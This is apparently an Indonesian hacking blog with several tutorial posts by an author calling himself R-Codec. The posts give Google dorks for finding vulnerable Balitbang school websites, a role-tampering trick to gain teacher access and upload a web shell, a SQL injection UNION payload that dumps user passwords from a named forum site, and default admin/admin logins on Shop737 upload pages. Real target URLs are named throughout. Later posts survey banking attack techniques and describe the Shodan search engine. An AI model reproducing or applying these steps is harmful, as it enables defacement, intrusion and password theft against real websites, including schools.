anu anu

 Hello all kali ini saya mau kasih tau cara Deface Balitbang .. yg kebanyakan web Sekolah Indonesia sch.id :D

oke simak saja  >> baca yang teliti jangan ada terlewati  yaaa

    Pertama masukan dork ane sendiri :
      inurl:/member/daftar.php "tim balitbang"
      inurl:/member/indexdaftar.php

 pilih target. jika sudah nemu target live > http://www.masukabawang.sch.id/ klik DAFTAR ..
http://www.masukabawang.sch.id/member/daftar.php < atau di exploit /member/daftar.php
terus daftar di situ.. eitt tunggu dulu jangan buru2 .. isi data data boleh ngasal juga yg penting email/gmail yg aktiv buak aktivasinya :3
 liat di gambar

nah kita harus daftar jadi sebagai guru .. :/ caranya pake Inspect Element.. liat gambar

yang "Tamu" sama yang Tamu yg bawah ganti mejadi >> Guru

jika sudah tinggal klik daftar ..
maka akan seperti ini ..

Tinggal buka email/gmail kita untuk validasi member

liat ss

   tinggal klik lanjutan dan LOGIN .. nah kita liat .. kita masuk sebagai GURU atau TAMU .
 kalau masuk sebgai guru berarti Vuln  kalau tamu cari yg lain oke .. jangan menyerah karna kebanyakan sudah pada di path :(
liat gambar

nah kalau seperti gambar yang di atas ,, kita tinggal pasang Shell atau nifip file..
INGAT JIKA INGIN TEBAX INDEX.PHP JANGAN LUPA BACKUP DULU ..
biar ngga ngerusak web2 sekolah indonesia ,, oke

dan cara nge uploadnya gni ke >>BELAJAR>>TAMBAH MATERI AJAR
maka akan tampil seperti ini



isi semua asal juga boleh nah yg file itu deface kamu shell.php atau file.html bebas pokoqnya :3 klik
Simpan ..  kalau ber hasil gini >>

Tambah Materi Ajar

Penyimpanan Materi Ajar berhasil dilakukan.


nah kita tinggal buka  caranya ke >>DOWNLOAD>>MATERI AJAR>>JUDUL YG KAMU>>BUKA>>KLIK DOWNLOAD maka akan keluar file yg kamu tadi unggah

live http://www.masukabawang.sch.id/soal/al9.html

nah ? gampang kan gimna .. saya cuman berbagi ilmu saja yg saya punya,, maaf kalau ada yg ngga suka , karna saya share cara ini :( terbuka) karna banyak yg minta diajarin ke fb ane.
apalah artinya grup kebanyakan orang cuman pada Lamer doank,, saya minta ajarin gini gitu pada di cuekin padahal apa gunanya grup kalau ada yg mau belajar malah di cuekin,, kalau post"n yg udah master pada berebutan . emang saya newbie saya sebelum bertanya saya juga cari2 informasi di google dulu. tapi ngga ada yang nyangkut.. mangkanya saya tanya2 ke grup ..oke itu curhat baut ane yg masih labil ini.. :D

 jika ada yang kurang paham atau tanya2 yg lain ya selagi ane bisa jawab atau membantu kalian saya akan meperjelaskannya :)) silahkan berkomentar atau ke >>facebook<<  

bye bye jangan lupa nitip nick ane yah R-CodeC :*

                                                            INGAT INI

1. "jangan menyerah , orang lain aja bisa masa kita ngga , yg mahakuasa tidak membedakan umat2nya. intinya bersungguh sungguh dan jangan menyerah dalam hal apapun" 

Cara deface teknik Balitbang

OH NO

cara deface forum terbaru

    met malem sob ketemu lagi sama ane R-Codec oke langsung aja nih
masukan dork nya inurl:/forums.asp?iFor= atau langsung diklik R-Codec
jiga sudah cari forum nya sobb okehh :D
 
kalau ane nemu site nya ini http://www.giuseppezollo.com/forum/forums.asp?iFor=12
jika buka forum itu terus lihat di barr adress ......
hapus angka yang di belakang nya hingga menjadi 
  http://www.giuseppezollo.com/forum/forums.asp?iFor=

terus masukan SQLI nya nih 12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
 sehingga menjadi 
http://www.giuseppezollo.com/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

terlihat password 

tinggal login deh ,,, okehh happy hecker newbie...

mungin segitu dulu dari ane R-Codec karna mau sholat dulu :D semoga bermanfaat ingatt gunakan sebijak mungin .. postkan komentar tinggalkan jejak oke :)

 

Deface Dengan Upload File On Shop 737

            met siang sobatt gimana pada sehatkan syukurlah .. kalau sehat kita belajar ngedeface yuu ... ?
kali ini ane mau kasih tau cara upload file on shop.. lagnsung simak boss

copikan dork nya di google
   intext:"Powered by Shop737" langsung

cari target pilih salah satu .. pilih situs nya ..  >.<

Saya ngambil site ==> http://pandansari-art.com

jika sudah ada situsnya langsung exploit aja boss :D
di belakang nya gantikan sama ==>  target/poto/upload.php

ngarti kagak :p  nih contoh situs Target ==>   http://pandansari-art.com/poto/index.php?imgdir=1 

di ganti menjadi ==> http://pandansari-art.com/poto/upload.php
maka ada user muncul..
masukan 

user : admin
pass : admin

jika suadah maka akan tampil seperti ini ... 

#Catatan :

No 1 : upload file txt/image (*ngak bisa php/html)

No 2 : pilih di Kategori mana file kalian di upload

No 3 : Klik Upload

tinggal masukan deh sesuka hati anda .. selamat anda berhasil

mungikin segitu aja ilmu dari R-Codec semoga bermanfaat okee :D







 
 

cara bobol internet bangking

met malem sob ketemu lagi yah ma ane R-Codec kali ini ane mau share bobol internet bangking . 
Sebenarnya sedikit pelurusan tentang istilah pelaku hacker dalam pembobolan yang sering terjadi di Internet, sebenarnya itu adalah ulah cracker, Craker berusaha membobol akun kita di Internet entah itu akun social media atau akun internet banking.

Dalam tulisan ini akan menjelaskan bagaimana cara cracker membobol akun internet banking di internet, penasaran dengan teknik-tekniknya ?

Berikut adalah beberapa cara yang digunakan cracker untuk membobol akun internet banking :

1. Teknik Session Hijacking

Dengan session hijacking, cracker menempatkan sistem monitoring/spying terhadap pengetikan yang dilakukan pengguna pada PC yang digunakan oleh pengguna (user) untuk mengunjungi situs internet banking. Untuk mengatasi masalah ini pengguna sebaiknya menggunakan komputer yang benar-benar terjamin dan tidak digunakan oleh sembarang orang, misalnya komputer di rumah, kantor, dsb. Perhatikan gambar berikut tentang session hijacking

2. Teknik Packet Sniffing

Pada teknik ini cracker melakukan monitoring atau penangkapan terhadap paket data yang ditransmisikan dari komputer user ke web server internet banking pada jaringan internet. Cracker yang melakukan teknik ini terkenal juga dengan istilah MITM (Man In The Middle). Untuk mengatasi masalah ini perlu dilakukan enkripsi/penyandian paket data pada komputer client sebelum dikirimkan melalui media internet ke web server. Perhatikan gambar berikut tentang packet sniffing.

3. Teknik DNS Spoofing

Pada teknik ini cracker berusaha membuat pengguna mengunjungi situs internet banking yang salah sehingga memberikan informasi rahasia kepada pihak yang tidak berhak. Untuk melakukan tehnik ini cracker umumnya membuat situs internet banking yang mirip namanya dengan nama server ecommerce asli. Misalnya www.klikbca.com merupakan situs yang asli, maka hacker akan membuat situs bernama www.klik_bca.com, www.klikbca.org, www.klik-bca.com, www.klikbca.co.id. Dengan demikian ketika pengguna membuka alamat yang salah, ia akan tetap menduga ia mengunjungsi situs klikbca yang benar.

Untuk mengatasi masalah tersebut di atas dapat dipecahkan dengan melengkapi Digital Certificates pada situs asli. Dengan demikian meskipun cracker dapat membuat nama yang sama namun tidak bisa melakukan pemalsuan digital certificate. Pengguna atau pengunjung situs dapat mengetahui bahwa situs itu asli atau tidak  dengan melihat ada tidaknya certificate pada situs tersebut menggunakan browser mereka. Disamping itu webserver eCommerce harus dilengkapi dengan firewall yang akan menyaring paket-paket data yang masuk sehingga terhindar dari serangan Denial Of Service (DoS). Perhatikan gambar berikut tentang DNS Spoofing

4. Teknik Website Defacing

Pada teknik ini cracker melakukan serangan pada situs asli misalkan www.klikbca.com kemudian mengganti isi halaman pada server tersebut dengan miliknya. Dengan demikian pengunjung akan mengunjungi alamat dan server yang benar namun halaman yang dibuat cracker.

Untuk mengatasi masalah di atas server eCommerce perlu dikonfigurasi dengan baik agar tidak memiliki security hole dan harus dilengkapi firewall yang akan menyaring paket data yang dapat masuk ke situs tersebut.

 ini untuk pengethauan saja yang saya berikan .. saya tidak bertanggung jawab jika ... :p semoga bermanfaat boss

cara deface dengan menanam shell.php

      Met malem sob kali ketemu lagi ama R-codec kali ini ane mau share tentang cara menanam  shell kayaknya banyak sekali yang belum tau ini ?
ya udah kagk banyak bacot dan cincong nih langsung aja dwonload videonya

R-CODEC

mungkin segitu aja dari ane semoga bermanfaat ilmunya R-Codec

mesin paling menakutkan di dunia SHODAN

met malem sob kali ini R-codec mau share tentang mesin paling menakutkanoke langsung aja nih

            Istilah mesin pencari atau “search engine” sudah tidak asing lagi di telinga kita. ada Google, Yahoo, Bing, dan lain sebagainya. Namun pernahkan anda mendengar mesin pencari bernama Shodan. saat anda membuka homepagenya di www.shodanhq.com ada slogan tertulis “Expose Online Devices”. Dari slogan tersebut harus diakui bahwa mesin pencari ini cukup mengerikan dan menghawatirkan. Bahkan, John Matherly, sang pencipta Shodan mengklaim bahwa mesin pencari buatannya adalah mesin pencari yang paling menakutkan di internet.

Shodan adalah sebuah mesin pencari yang dirancang untuk mencari perangkat dan sistem komputer yang terhubung dengan internet. Situs ini diluncurkan pada tahun 2008 oleh programmer John Matherly, yang memiliki ide mencari peralatan-peralatan yang terhubung dengan Internet. Shodan dianggap sebagai versi “gelap” dari Google yang mampu mencari server, webcam, printer, router, dan semua perangkat yang terhubung dengan internet. Berbeda dengan Google yang digunakan untuk mencari sebuah artikel, situs, atau informasi terkait web.

Shodan bekerja tanpa henti dan mengumpulkan informasi jutaan perangkat dan layanan yang terhubung dengan internet setiap bulan. Mesin pencari “gelap” Shodan ini mampu menemukan sistem lampu lalu lintas, kamera CCTV, perangkat otomatisasi rumah, sistem kontrol untuk taman air, pompa bensin, pendingin anggur hotel. Bahkan, sistem pembangkit listrik tenaga nuklir dapat ditemukan menggunakan Shodan.

John Matherly mengatakan bahwa Shodan membatasi hingga 10 hasil pencarian tanpa akun dan 50 hasil pencarian jika menggunakan akun. Sang pencipta Shodan mengatakan bahwa tujuan diciptakannya Shodan adalah untuk kebaikan.

MApa yang krusial yang membuat Shodan mampu untuk melakukan hal (pencarian) ini – dan apa yang membuat Shodan begitu menakutkan – adalah bahwa sangat sedikit dari perangkat yang terhubung dengan internet menerapkan keamanan yang benar-benar baik.

“Ini adalah kegagalan keamanan besar-besaran” kata HD Moore, Chief Security  dari Rapid 7, yang mengoperasikan versi pribadi database Shodan seperti untuk tujuan penelitian sendiri.

Pada Defcon cybersecurity conference tahun lalu Dan Tentler seorang Tester penetrasi keamanan independen, menunjukkan bagaimana ia menggunakan Shodan untuk menemukan sistem kontrol untuk menguapkan pendingin, pemanas air bertekanan, dan pintu garasi. Ia juga menemukan tempat pencucian mobil yang bisa dinyalakan dan dimatikan, sebuah arena hoki di Denmark yang dapat dicairkan dengan mengklik tombol. Seluruh sistem kontrol lalu lintas Sebuah kota yang terhubung ke Internet dan dapat dimasukkan ke dalam “test mode” dengan entri perintah tunggal. Dan dia juga menemukan sistem kontrol untuk pembangkit listrik tenaga air di Perancis dengan dua turbin yang masing-masing menghasilkan 3 megawatt.

“Anda benar-benar bisa melakukan beberapa kerusakan serius dengan hal ini,” kata Tentler.  Ini adalah hal yang menghawatirkan jika jatuh ke tangan yang salah.

Seperti yang dilansir dari CNN (08/04/2013), kehadiran Shodan ini tetap seperti sebuah pedang bermata dua, baik tidaknya mesin pencari Shodan ini akan tergantung dari penggunanya.

SUMBER : Binus Hecker